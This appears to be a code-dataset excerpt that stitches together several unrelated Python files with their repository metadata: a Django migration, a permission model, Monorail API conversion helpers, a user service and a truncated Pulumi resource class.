            # 'Cambio' is Spanish for "exchange (rate)"; user-facing label.
            field=models.DecimalField(decimal_places=2, default=0.0, max_digits=30, verbose_name='Cambio'),
        ),
        migrations.AddField(
            model_name='sale',
            name='exchange2',
            field=models.DecimalField(decimal_places=2, default=0.0, max_digits=30, verbose_name='Cambio'),
        ),
    ]
| [
"infantefernandezisela@gmail.com"
] | infantefernandezisela@gmail.com |
a04fd2d3b518817724d9cab376f37c2b71f9a3be | 6c40a17cee8777dbf4e0b6d85e624eacefd67a69 | /ez2pay/models/permission.py | 4d79a47c58bd77bd06ab42d129503eadcdf61164 | [
"MIT"
] | permissive | fangpenlin/ez2pay | ae5125c8c05bad0178d7c8bb0f0c256489e0127a | 13ce4782d3c673a0cb07003a826a10bdfbe6a9ad | refs/heads/master | 2021-05-28T06:01:56.627261 | 2013-12-03T01:46:23 | 2013-12-03T01:46:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,678 | py | from __future__ import unicode_literals
from . import tables
from .base import BaseTableModel
class PermissionModel(BaseTableModel):
    """Permission data model.

    Data-access layer for rows of the Permission table.  All queries go
    through the SQLAlchemy session supplied by BaseTableModel.
    """

    TABLE = tables.Permission

    def get_by_name(self, permission_name):
        """Get a permission by name.

        Returns the first Permission row whose permission_name matches,
        or None if no such row exists.
        """
        permission = (
            self.session
            .query(tables.Permission)
            .filter_by(permission_name=permission_name)
            .first()
        )
        return permission

    def create(
        self,
        permission_name,
        description=None,
    ):
        """Create a new permission and return its id.

        The description is optional; when omitted, the column stays NULL.
        """
        permission = tables.Permission(
            permission_name=unicode(permission_name),
            description=unicode(description) if description is not None else None,
        )
        self.session.add(permission)
        # flush the change, so we can get real id
        # (the primary key is only assigned by the database on flush)
        self.session.flush()
        assert permission.permission_id is not None, \
            'Permission id should not be none here'
        permission_id = permission.permission_id
        self.logger.info('Create permission %s', permission_name)
        return permission_id

    def update_permission(self, permission_id, **kwargs):
        """Update attributes of a permission.

        Only 'description' and 'permission_name' keyword arguments are
        honored; any other keys are silently ignored.  Raises via
        self.get(..., raise_error=True) if the permission does not exist.
        """
        permission = self.get(permission_id, raise_error=True)
        if 'description' in kwargs:
            permission.description = kwargs['description']
        if 'permission_name' in kwargs:
            permission.permission_name = kwargs['permission_name']
        self.session.add(permission)
| [
"bornstub@gmail.com"
] | bornstub@gmail.com |
9114b0a4d64ffaa928a2b6eca362492c7d4d3a45 | a034d4ba39789e4a351112c46dd04a38180cd06c | /appengine/monorail/services/api_pb2_v1_helpers.py | b67a0d604e05fada9d917b76f008ffec195dcc55 | [
"BSD-3-Clause"
] | permissive | asdfghjjklllllaaa/infra | 050ad249ab44f264b4e2080aa9537ce74aafb022 | 8f63af54e46194cd29291813f2790ff6e986804d | refs/heads/master | 2023-01-10T21:55:44.811835 | 2019-07-01T14:03:32 | 2019-07-01T14:03:32 | 194,691,941 | 1 | 0 | BSD-3-Clause | 2023-01-07T07:12:37 | 2019-07-01T14:45:29 | Python | UTF-8 | Python | false | false | 23,394 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Convert Monorail PB objects to API PB objects"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import datetime
import logging
import time
from businesslogic import work_env
from framework import exceptions
from framework import framework_constants
from framework import framework_helpers
from framework import framework_views
from framework import permissions
from framework import timestr
from proto import api_pb2_v1
from proto import project_pb2
from proto import tracker_pb2
from services import project_svc
from tracker import field_helpers
from tracker import tracker_bizobj
from tracker import tracker_helpers
def convert_project(project, config, role, templates):
  """Convert a Monorail Project PB into an API ProjectWrapper PB."""
  name = project.project_name
  fields = {
      'kind': 'monorail#project',
      'name': name,
      'externalId': name,
      'htmlLink': '/p/%s/' % name,
      'summary': project.summary,
      'description': project.description,
      'role': role,
      'issuesConfig': convert_project_config(config, templates),
  }
  return api_pb2_v1.ProjectWrapper(**fields)
def convert_project_config(config, templates):
  """Convert a Monorail ProjectIssueConfig PB into its API counterpart."""
  statuses = [convert_status(s) for s in config.well_known_statuses]
  labels = [convert_label(l) for l in config.well_known_labels]
  prompts = [convert_template(t) for t in templates]
  return api_pb2_v1.ProjectIssueConfig(
      kind='monorail#projectIssueConfig',
      restrictToKnown=config.restrict_to_known,
      defaultColumns=config.default_col_spec.split(),
      defaultSorting=config.default_sort_spec.split(),
      statuses=statuses,
      labels=labels,
      prompts=prompts,
      defaultPromptForMembers=config.default_template_for_developers,
      defaultPromptForNonMembers=config.default_template_for_users)
def convert_status(status):
  """Translate a Monorail StatusDef PB into an API Status PB."""
  fields = {
      'status': status.status,
      'meansOpen': status.means_open,
      'description': status.status_docstring,
  }
  return api_pb2_v1.Status(**fields)
def convert_label(label):
  """Translate a Monorail LabelDef PB into an API Label PB."""
  fields = {
      'label': label.label,
      'description': label.label_docstring,
  }
  return api_pb2_v1.Label(**fields)
def convert_template(template):
  """Translate a Monorail TemplateDef PB into an API Prompt PB."""
  fields = {
      'name': template.name,
      'title': template.summary,
      'description': template.content,
      'titleMustBeEdited': template.summary_must_be_edited,
      'status': template.status,
      'labels': template.labels,
      'membersOnly': template.members_only,
      'defaultToMember': template.owner_defaults_to_member,
      'componentRequired': template.component_required,
  }
  return api_pb2_v1.Prompt(**fields)
def convert_person(user_id, cnxn, services, trap_exception=False):
  """Convert user id to API AtomPerson PB or None if user_id is None.

  Args:
    user_id: int user id, or None/0 for an unset optional user field.
    cnxn: connection to the SQL database.
    services: connections to backend services.
    trap_exception: if True, an unknown user id is logged and converted
        to None instead of raising NoSuchUserException.

  Returns:
    An api_pb2_v1.AtomPerson, or None for unset/unknown (trapped) users.

  Raises:
    exceptions.NoSuchUserException: the user does not exist and
        trap_exception is False.
  """
  if not user_id:
    # convert_person should handle 'converting' optional user values,
    # like issue.owner, where user_id may be None.
    return None
  if user_id == framework_constants.DELETED_USER_ID:
    # Deleted users get a placeholder name and no profile link.
    return api_pb2_v1.AtomPerson(
        kind='monorail#issuePerson',
        name=framework_constants.DELETED_USER_NAME)
  try:
    user = services.user.GetUser(cnxn, user_id)
  except exceptions.NoSuchUserException as ex:
    if trap_exception:
      logging.warning(str(ex))
      return None
    else:
      raise ex
  # last_visit_days_ago stays None when we have no visit timestamp at all.
  days_ago = None
  if user.last_visit_timestamp:
    secs_ago = int(time.time()) - user.last_visit_timestamp
    days_ago = secs_ago // framework_constants.SECS_PER_DAY
  return api_pb2_v1.AtomPerson(
      kind='monorail#issuePerson',
      name=user.email,
      htmlLink='https://%s/u/%d' % (framework_helpers.GetHostPort(), user_id),
      last_visit_days_ago=days_ago,
      email_bouncing=bool(user.email_bounce_timestamp),
      vacation_message=user.vacation_message)
def convert_issue_ids(issue_ids, mar, services):
  """Convert global issue ids into API IssueRef PBs.

  Ids that do not resolve to an existing issue are silently dropped, so
  the returned list may be shorter than the input.
  """
  # GetIssues skips ids it cannot resolve.
  issues = services.issue.GetIssues(mar.cnxn, issue_ids)
  return [
      api_pb2_v1.IssueRef(
          issueId=issue.local_id,
          projectId=issue.project_name,
          kind='monorail#issueRef')
      for issue in issues]
def convert_issueref_pbs(issueref_pbs, mar, services):
  """Convert API IssueRef PBs to global issue ids.

  Each IssueRef may name a project explicitly; otherwise the current
  request's project (mar.project_id) is assumed.  References to issues
  that do not exist are logged and skipped.

  Returns:
    A list of global issue ids, or None if issueref_pbs is empty/None
    (note the asymmetry: an empty input yields None, not []).
  """
  if issueref_pbs:
    result = []
    for ir in issueref_pbs:
      project_id = mar.project_id
      if ir.projectId:
        project = services.project.GetProjectByName(
            mar.cnxn, ir.projectId)
        if project:
          project_id = project.project_id
        # If the named project does not exist we fall back to the
        # request's project and let the issue lookup below fail/skip.
      try:
        issue = services.issue.GetIssueByLocalID(
            mar.cnxn, project_id, ir.issueId)
        result.append(issue.issue_id)
      except exceptions.NoSuchIssueException:
        logging.warning(
            'Issue (%s:%d) does not exist.' % (ir.projectId, ir.issueId))
    return result
  else:
    return None
def convert_approvals(cnxn, approval_values, services, config, phases):
  """Convert an Issue's Monorail ApprovalValue PBs to API Approval.

  Approval values whose field def is missing or is not of APPROVAL_TYPE
  are logged and skipped, as are phase references that do not match any
  of the given phases.
  """
  # Index field defs and phases once so each approval value is a dict hit.
  fds_by_id = {fd.field_id: fd for fd in config.field_defs}
  phases_by_id = {phase.phase_id: phase for phase in phases}
  approvals = []
  for av in approval_values:
    approval_fd = fds_by_id.get(av.approval_id)
    if approval_fd is None:
      logging.warning(
          'Approval (%d) does not exist' % av.approval_id)
      continue
    if approval_fd.field_type is not tracker_pb2.FieldTypes.APPROVAL_TYPE:
      logging.warning(
          'field %s has unexpected field_type: %s' % (
              approval_fd.field_name, approval_fd.field_type.name))
      continue
    approval = api_pb2_v1.Approval()
    approval.approvalName = approval_fd.field_name
    # convert_person may return None (e.g. unset ids); filter those out.
    approvers = [convert_person(approver_id, cnxn, services)
                 for approver_id in av.approver_ids]
    approval.approvers = [approver for approver in approvers if approver]
    approval.status = api_pb2_v1.ApprovalStatus(av.status.number)
    if av.setter_id:
      approval.setter = convert_person(av.setter_id, cnxn, services)
    if av.set_on:
      approval.setOn = datetime.datetime.fromtimestamp(av.set_on)
    if av.phase_id:
      try:
        approval.phaseName = phases_by_id[av.phase_id].name
      except KeyError:
        logging.warning('phase %d not found in given phases list' % av.phase_id)
    approvals.append(approval)
  return approvals
def convert_phases(phases):
  """Convert an Issue's Monorail Phase PBs to API Phase.

  Phases without a name are skipped (they cannot be addressed by the API).
  """
  converted_phases = []
  for idx, phase in enumerate(phases):
    if not phase.name:
      try:
        logging.warning(
            'Phase %d has no name, skipping conversion.' % phase.phase_id)
      except TypeError:
        # phase.phase_id itself may be None, which makes the %d formatting
        # above raise TypeError; fall back to logging by list position.
        logging.warning(
            'Phase #%d (%s) has no name or id, skipping conversion.' % (
                idx, phase))
      continue
    converted = api_pb2_v1.Phase(phaseName=phase.name, rank=phase.rank)
    converted_phases.append(converted)
  return converted_phases
def convert_issue(cls, issue, mar, services):
  """Convert Monorail Issue PB to API IssuesGetInsertResponse.

  Args:
    cls: the API response message class to instantiate (e.g.
        IssuesGetInsertResponse); it must accept the keyword fields below.
    issue: the Monorail Issue PB to convert.
    mar: monorail API request info (auth, cnxn, perms).
    services: connections to backend services.

  Returns:
    An instance of cls populated from the issue, including permissions
    computed for the requesting user.
  """
  config = services.config.GetProjectConfig(mar.cnxn, issue.project_id)
  granted_perms = tracker_bizobj.GetGrantedPerms(
      issue, mar.auth.effective_ids, config)
  issue_project = services.project.GetProject(mar.cnxn, issue.project_id)
  # Resolve the issue's component ids to their human-readable paths.
  component_list = []
  for cd in config.component_defs:
    cid = cd.component_id
    if cid in issue.component_ids:
      component_list.append(cd.path)
  # convert_person may yield None for unknown users; drop those entries.
  cc_list = [convert_person(p, mar.cnxn, services) for p in issue.cc_ids]
  cc_list = [p for p in cc_list if p is not None]
  field_values_list = []
  fds_by_id = {
      fd.field_id: fd for fd in config.field_defs}
  phases_by_id = {phase.phase_id: phase for phase in issue.phases}
  for fv in issue.field_values:
    fd = fds_by_id.get(fv.field_id)
    if not fd:
      logging.warning('Custom field %d of project %s does not exist',
                      fv.field_id, issue_project.project_name)
      continue
    val = None
    if fv.user_id:
      # User-type fields are rendered as the user's email address.
      val = _get_user_email(
          services.user, mar.cnxn, fv.user_id)
    else:
      val = tracker_bizobj.GetFieldValue(fv, {})
      if not isinstance(val, basestring):
        # Non-string values (ints, dates, etc.) are serialized as strings.
        val = str(val)
    new_fv = api_pb2_v1.FieldValue(
        fieldName=fd.field_name,
        fieldValue=val,
        derived=fv.derived)
    if fd.approval_id:  # Attach parent approval name
      approval_fd = fds_by_id.get(fd.approval_id)
      if not approval_fd:
        logging.warning('Parent approval field %d of field %s does not exist',
                        fd.approval_id, fd.field_name)
      else:
        new_fv.approvalName = approval_fd.field_name
    elif fv.phase_id:  # Attach phase name
      phase = phases_by_id.get(fv.phase_id)
      if not phase:
        logging.warning('Phase %d for field %s does not exist',
                        fv.phase_id, fd.field_name)
      else:
        new_fv.phaseName = phase.name
    field_values_list.append(new_fv)
  approval_values_list = convert_approvals(
      mar.cnxn, issue.approval_values, services, config, issue.phases)
  phases_list = convert_phases(issue.phases)
  with work_env.WorkEnv(mar, services) as we:
    starred = we.IsIssueStarred(issue)
  resp = cls(
      kind='monorail#issue',
      id=issue.local_id,
      title=issue.summary,
      summary=issue.summary,
      projectId=issue_project.project_name,
      stars=issue.star_count,
      starred=starred,
      status=issue.status,
      state=(api_pb2_v1.IssueState.open if
             tracker_helpers.MeansOpenInProject(
                 tracker_bizobj.GetStatus(issue), config)
             else api_pb2_v1.IssueState.closed),
      labels=issue.labels,
      components=component_list,
      author=convert_person(issue.reporter_id, mar.cnxn, services),
      owner=convert_person(issue.owner_id, mar.cnxn, services),
      cc=cc_list,
      updated=datetime.datetime.fromtimestamp(issue.modified_timestamp),
      published=datetime.datetime.fromtimestamp(issue.opened_timestamp),
      blockedOn=convert_issue_ids(issue.blocked_on_iids, mar, services),
      blocking=convert_issue_ids(issue.blocking_iids, mar, services),
      canComment=permissions.CanCommentIssue(
          mar.auth.effective_ids, mar.perms, issue_project, issue,
          granted_perms=granted_perms),
      canEdit=permissions.CanEditIssue(
          mar.auth.effective_ids, mar.perms, issue_project, issue,
          granted_perms=granted_perms),
      fieldValues=field_values_list,
      approvalValues=approval_values_list,
      phases=phases_list
  )
  # Optional timestamps: only set when the issue actually has them.
  if issue.closed_timestamp > 0:
    resp.closed = datetime.datetime.fromtimestamp(issue.closed_timestamp)
  if issue.merged_into:
    resp.mergedInto=convert_issue_ids([issue.merged_into], mar, services)[0]
  if issue.owner_modified_timestamp:
    resp.owner_modified = datetime.datetime.fromtimestamp(
        issue.owner_modified_timestamp)
  if issue.status_modified_timestamp:
    resp.status_modified = datetime.datetime.fromtimestamp(
        issue.status_modified_timestamp)
  if issue.component_modified_timestamp:
    resp.component_modified = datetime.datetime.fromtimestamp(
        issue.component_modified_timestamp)
  return resp
def convert_comment(issue, comment, mar, services, granted_perms):
  """Convert Monorail IssueComment PB to API IssueCommentWrapper.

  canDelete reflects whether the requesting user (mar.auth.user_id) may
  delete this specific comment under the issue-level permissions.
  """
  perms = permissions.UpdateIssuePermissions(
      mar.perms, mar.project, issue, mar.auth.effective_ids,
      granted_perms=granted_perms)
  commenter = services.user.GetUser(mar.cnxn, comment.user_id)
  can_delete = permissions.CanDeleteComment(
      comment, commenter, mar.auth.user_id, perms)
  return api_pb2_v1.IssueCommentWrapper(
      attachments=[convert_attachment(a) for a in comment.attachments],
      # trap_exception: a missing author must not break comment listing.
      author=convert_person(comment.user_id, mar.cnxn, services,
                            trap_exception=True),
      canDelete=can_delete,
      content=comment.content,
      deletedBy=convert_person(comment.deleted_by, mar.cnxn, services,
                               trap_exception=True),
      id=comment.sequence,
      published=datetime.datetime.fromtimestamp(comment.timestamp),
      updates=convert_amendments(issue, comment.amendments, mar, services),
      kind='monorail#issueComment',
      is_description=comment.is_description)
def convert_approval_comment(issue, comment, mar, services, granted_perms):
  """Convert a Monorail approval IssueComment PB to ApprovalCommentWrapper.

  Mirrors convert_comment, but the amendments are converted with the
  approval-specific converter and the wrapper kind differs.
  """
  perms = permissions.UpdateIssuePermissions(
      mar.perms, mar.project, issue, mar.auth.effective_ids,
      granted_perms=granted_perms)
  commenter = services.user.GetUser(mar.cnxn, comment.user_id)
  can_delete = permissions.CanDeleteComment(
      comment, commenter, mar.auth.user_id, perms)
  return api_pb2_v1.ApprovalCommentWrapper(
      attachments=[convert_attachment(a) for a in comment.attachments],
      # trap_exception: a missing author must not break comment listing.
      author=convert_person(
          comment.user_id, mar.cnxn, services, trap_exception=True),
      canDelete=can_delete,
      content=comment.content,
      deletedBy=convert_person(comment.deleted_by, mar.cnxn, services,
                               trap_exception=True),
      id=comment.sequence,
      published=datetime.datetime.fromtimestamp(comment.timestamp),
      approvalUpdates=convert_approval_amendments(
          comment.amendments, mar, services),
      kind='monorail#approvalComment',
      is_description=comment.is_description)
def convert_attachment(attachment):
  """Translate a Monorail Attachment PB into an API Attachment."""
  fields = {
      'attachmentId': attachment.attachment_id,
      'fileName': attachment.filename,
      'fileSize': attachment.filesize,
      'mimetype': attachment.mimetype,
      'isDeleted': attachment.deleted,
  }
  return api_pb2_v1.Attachment(**fields)
def convert_amendments(issue, amendments, mar, services):
  """Convert a list of Monorail Amendment PBs to API Update.

  All amendments of one comment are folded into a single Update message;
  later amendments of the same scalar field overwrite earlier ones.
  """
  amendments_user_ids = tracker_bizobj.UsersInvolvedInAmendments(amendments)
  users_by_id = framework_views.MakeAllUserViews(
      mar.cnxn, services.user, amendments_user_ids)
  framework_views.RevealAllEmailsToMembers(mar.auth, mar.project, users_by_id)
  result = api_pb2_v1.Update(kind='monorail#issueCommentUpdate')
  for amendment in amendments:
    if amendment.field == tracker_pb2.FieldID.SUMMARY:
      result.summary = amendment.newvalue
    elif amendment.field == tracker_pb2.FieldID.STATUS:
      result.status = amendment.newvalue
    elif amendment.field == tracker_pb2.FieldID.OWNER:
      if len(amendment.added_user_ids) == 0:
        # Owner was cleared; report the sentinel "no user" name.
        result.owner = framework_constants.NO_USER_NAME
      else:
        result.owner = _get_user_email(
            services.user, mar.cnxn, amendment.added_user_ids[0])
    elif amendment.field == tracker_pb2.FieldID.LABELS:
      result.labels = amendment.newvalue.split()
    elif amendment.field == tracker_pb2.FieldID.CC:
      # Removed CCs are reported with a '-' prefix, matching query syntax.
      for user_id in amendment.added_user_ids:
        user_email = _get_user_email(
            services.user, mar.cnxn, user_id)
        result.cc.append(user_email)
      for user_id in amendment.removed_user_ids:
        user_email = _get_user_email(
            services.user, mar.cnxn, user_id)
        result.cc.append('-%s' % user_email)
    elif amendment.field == tracker_pb2.FieldID.BLOCKEDON:
      # Bare local ids are qualified with this issue's project name.
      result.blockedOn = _append_project(
          amendment.newvalue, issue.project_name)
    elif amendment.field == tracker_pb2.FieldID.BLOCKING:
      result.blocking = _append_project(
          amendment.newvalue, issue.project_name)
    elif amendment.field == tracker_pb2.FieldID.MERGEDINTO:
      result.mergedInto = amendment.newvalue
    elif amendment.field == tracker_pb2.FieldID.COMPONENTS:
      result.components = amendment.newvalue.split()
    elif amendment.field == tracker_pb2.FieldID.CUSTOM:
      fv = api_pb2_v1.FieldValue()
      fv.fieldName = amendment.custom_field_name
      fv.fieldValue = tracker_bizobj.AmendmentString(amendment, users_by_id)
      result.fieldValues.append(fv)
  return result
def convert_approval_amendments(amendments, mar, services):
  """Convert a list of Monorail Amendment PBs API ApprovalUpdate.

  Approval amendments are stored as CUSTOM-field amendments whose name
  distinguishes the special 'Status' and 'Approvers' fields from ordinary
  custom field values.
  """
  amendments_user_ids = tracker_bizobj.UsersInvolvedInAmendments(amendments)
  users_by_id = framework_views.MakeAllUserViews(
      mar.cnxn, services.user, amendments_user_ids)
  framework_views.RevealAllEmailsToMembers(mar.auth, mar.project, users_by_id)
  result = api_pb2_v1.ApprovalUpdate(kind='monorail#approvalCommentUpdate')
  for amendment in amendments:
    if amendment.field == tracker_pb2.FieldID.CUSTOM:
      if amendment.custom_field_name == 'Status':
        # Map the stored status string back through the proto enum to the
        # API enum's canonical name.
        status_number = tracker_pb2.ApprovalStatus(
            amendment.newvalue.upper()).number
        result.status = api_pb2_v1.ApprovalStatus(status_number).name
      elif amendment.custom_field_name == 'Approvers':
        # Removed approvers are reported with a '-' prefix.
        for user_id in amendment.added_user_ids:
          user_email = _get_user_email(
              services.user, mar.cnxn, user_id)
          result.approvers.append(user_email)
        for user_id in amendment.removed_user_ids:
          user_email = _get_user_email(
              services.user, mar.cnxn, user_id)
          result.approvers.append('-%s' % user_email)
      else:
        fv = api_pb2_v1.FieldValue()
        fv.fieldName = amendment.custom_field_name
        fv.fieldValue = tracker_bizobj.AmendmentString(amendment, users_by_id)
        # TODO(jojwang): monorail:4229, add approvalName field to FieldValue
        result.fieldValues.append(fv)
  return result
def _get_user_email(user_service, cnxn, user_id):
  """Return the email address for user_id, with placeholder fallbacks."""
  # Deleted users and unset (None/0) ids both map to the deleted-user
  # placeholder; _get_user_email must tolerate optional values such as
  # issue.owner being None.
  # TODO(jojwang): monorail:5740, unset ids should return USER_NOT_FOUND.
  if not user_id or user_id == framework_constants.DELETED_USER_ID:
    return framework_constants.DELETED_USER_NAME
  try:
    return user_service.LookupUserEmail(cnxn, user_id)
  except exceptions.NoSuchUserException:
    return framework_constants.USER_NOT_FOUND_NAME
def _append_project(issue_ids, project_name):
"""Append project name to convert <id> to <project>:<id> format."""
result = []
id_list = issue_ids.split()
for id_str in id_list:
if ':' in id_str:
result.append(id_str)
# '-' means this issue is being removed
elif id_str.startswith('-'):
result.append('-%s:%s' % (project_name, id_str[1:]))
else:
result.append('%s:%s' % (project_name, id_str))
return result
def split_remove_add(item_list):
  """Partition items into (to_add, to_remove).

  Items prefixed with '-' are to be removed (the prefix is stripped);
  everything else is to be added.  Relative order is preserved.
  """
  to_add = [item for item in item_list if not item.startswith('-')]
  to_remove = [item[1:] for item in item_list if item.startswith('-')]
  return to_add, to_remove
# TODO(sheyang): batch the SQL queries to fetch projects/issues.
def issue_global_ids(project_local_id_pairs, mar, services):
  """Find global issues ids given <project_name>:<issue_local_id> pairs.

  Pairs without an explicit project name are resolved against project_id.

  Raises:
    exceptions.NoSuchProjectException: a named project does not exist.
    exceptions.NoSuchIssueException: via LookupIssueID, if an issue
        does not exist in the resolved project.
  """
  result = []
  for pair in project_local_id_pairs:
    issue_project_id = None
    local_id = None
    if ':' in pair:
      pair_ary = pair.split(':')
      project_name = pair_ary[0]
      local_id = int(pair_ary[1])
      project = services.project.GetProjectByName(mar.cnxn, project_name)
      if not project:
        raise exceptions.NoSuchProjectException(
            'Project %s does not exist' % project_name)
      issue_project_id = project.project_id
    else:
      # Bare id: assume the caller-supplied default project.
      issue_project_id = project_id
      local_id = int(pair)
    result.append(
        services.issue.LookupIssueID(mar.cnxn, issue_project_id, local_id))
  return result
def convert_group_settings(group_name, setting):
  """Translate UserGroupSettings into an API UserGroupSettingsWrapper."""
  fields = {
      'groupName': group_name,
      'who_can_view_members': setting.who_can_view_members,
      'ext_group_type': setting.ext_group_type,
      'last_sync_time': setting.last_sync_time,
  }
  return api_pb2_v1.UserGroupSettingsWrapper(**fields)
def convert_component_def(cd, mar, services):
  """Convert ComponentDef PB to Component PB.

  Resolves the component's project name and all involved user ids
  (admins, CCs, creator, modifier) to email addresses in bulk.
  """
  project_name = services.project.LookupProjectNames(
      mar.cnxn, [cd.project_id])[cd.project_id]
  # Collect every user id referenced by the component so a single bulk
  # email lookup suffices.
  user_ids = set()
  user_ids.update(
      cd.admin_ids + cd.cc_ids + [cd.creator_id] + [cd.modifier_id])
  user_names_dict = services.user.LookupUserEmails(mar.cnxn, list(user_ids))
  component = api_pb2_v1.Component(
      componentId=cd.component_id,
      projectName=project_name,
      componentPath=cd.path,
      description=cd.docstring,
      admin=sorted([user_names_dict[uid] for uid in cd.admin_ids]),
      cc=sorted([user_names_dict[uid] for uid in cd.cc_ids]),
      deprecated=cd.deprecated)
  # created/modified metadata is optional on a ComponentDef.
  if cd.created:
    component.created = datetime.datetime.fromtimestamp(cd.created)
    component.creator = user_names_dict[cd.creator_id]
  if cd.modified:
    component.modified = datetime.datetime.fromtimestamp(cd.modified)
    component.modifier = user_names_dict[cd.modifier_id]
  return component
def convert_component_ids(config, component_names):
  """Map component path names (case-insensitively) to component ids.

  The returned ids follow the order of config.component_defs, not the
  order of component_names.
  """
  wanted = {name.lower() for name in component_names}
  return [cd.component_id for cd in config.component_defs
          if cd.path.lower() in wanted]
def convert_field_values(field_values, mar, services):
  """Convert user passed in field value list to FieldValue PB, or labels.

  Enum-type custom fields are stored as labels ("FieldName-Value"), so
  their add/remove operations are returned in the label lists; all other
  field types produce FieldValue PBs.

  Args:
    field_values: list of api_pb2_v1.FieldValue from the request.
    mar: monorail API request info (provides config and cnxn).
    services: connections to backend services.

  Returns:
    A 5-tuple (fv_list_add, fv_list_remove, fv_list_clear,
    label_list_add, label_list_remove).  Unknown field names and
    unrecognized operators are logged and skipped.
  """
  fv_list_add = []
  fv_list_remove = []
  fv_list_clear = []
  label_list_add = []
  label_list_remove = []
  field_name_dict = {
      fd.field_name: fd for fd in mar.config.field_defs}
  for fv in field_values:
    field_def = field_name_dict.get(fv.fieldName)
    if not field_def:
      # Fixed log message: previously read "Custom field %s of does not
      # exist" (leftover words from an edit).
      logging.warning('Custom field %s does not exist', fv.fieldName)
      continue
    if fv.operator == api_pb2_v1.FieldValueOperator.clear:
      fv_list_clear.append(field_def.field_id)
      continue
    # Enum fields are stored as labels
    if field_def.field_type == tracker_pb2.FieldTypes.ENUM_TYPE:
      raw_val = '%s-%s' % (fv.fieldName, fv.fieldValue)
      if fv.operator == api_pb2_v1.FieldValueOperator.remove:
        label_list_remove.append(raw_val)
      elif fv.operator == api_pb2_v1.FieldValueOperator.add:
        label_list_add.append(raw_val)
      else:  # pragma: no cover
        # Fixed typo: "operater" -> "operator".
        logging.warning('Unsupported field value operator %s', fv.operator)
    else:
      new_fv = field_helpers.ParseOneFieldValue(
          mar.cnxn, services.user, field_def, fv.fieldValue)
      if fv.operator == api_pb2_v1.FieldValueOperator.remove:
        fv_list_remove.append(new_fv)
      elif fv.operator == api_pb2_v1.FieldValueOperator.add:
        fv_list_add.append(new_fv)
      else:  # pragma: no cover
        logging.warning('Unsupported field value operator %s', fv.operator)
  return (fv_list_add, fv_list_remove, fv_list_clear,
          label_list_add, label_list_remove)
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
0b5493b2e903ebb798213959fd1101e12390742e | 9f5557fd6a1d809e7026e23d58f3da57a0c0cbcc | /vega/service/user_service.py | 82ae4a5a0971b198ec36c76d8d8a0e8f7daf8b9d | [] | no_license | biao111/learn_python2 | e5150b7bb7cdd0166330ff159d83a809ca9d81d7 | 60f8fc1f7da8ae22dae2314b55dbe669b404d95a | refs/heads/master | 2023-01-07T16:56:42.123504 | 2020-11-08T05:53:10 | 2020-11-08T05:53:10 | 310,993,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,230 | py | from db.user_dao import UserDao
class UserService:
__user_dao = UserDao()
#验证用户登录
def login(self,username,password):
result = self.__user_dao.login(username,password)
return result
#查询角色
def search_user_role(self,username):
role = self.__user_dao.search_user_role(username)
return role
# 添加用户
def insert_user(self, username, password, email, role_id):
self.__user_dao.insert_user(username, password, email, role_id)
# 查询用户列表
def search_list(self, page):
result = self.__user_dao.search_list(page)
return result
# 查询用户总页数
def search_count_page(self):
count_page = self.__user_dao.search_count_page()
return count_page
#修改用户信息
def update_user(self,username,password,email,role_id,id):
self.__user_dao.update_user(username,password,email,role_id,id)
# 删除用户信息
def delete_by_id(self, id):
self.__user_dao.delete_by_id(id)
#查询用户ID
def search_userid(self,username):
userid = self.__user_dao.search_userid(username)
return userid
| [
"18211149974@163.com"
] | 18211149974@163.com |
8287dba7a61531a7caacf4b6d203bf647d570660 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/operationsmanagement/management_configuration.py | 9fcbdda9e01fec5b6c281daa72b730ae9185a220 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,608 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ManagementConfigurationArgs', 'ManagementConfiguration']
@pulumi.input_type
class ManagementConfigurationArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
management_configuration_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input['ManagementConfigurationPropertiesArgs']] = None):
"""
The set of arguments for constructing a ManagementConfiguration resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group to get. The name is case insensitive.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] management_configuration_name: User Management Configuration Name.
:param pulumi.Input['ManagementConfigurationPropertiesArgs'] properties: Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if location is not None:
pulumi.set(__self__, "location", location)
if management_configuration_name is not None:
pulumi.set(__self__, "management_configuration_name", management_configuration_name)
if properties is not None:
pulumi.set(__self__, "properties", properties)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group to get. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="managementConfigurationName")
def management_configuration_name(self) -> Optional[pulumi.Input[str]]:
"""
User Management Configuration Name.
"""
return pulumi.get(self, "management_configuration_name")
@management_configuration_name.setter
def management_configuration_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "management_configuration_name", value)
@property
@pulumi.getter
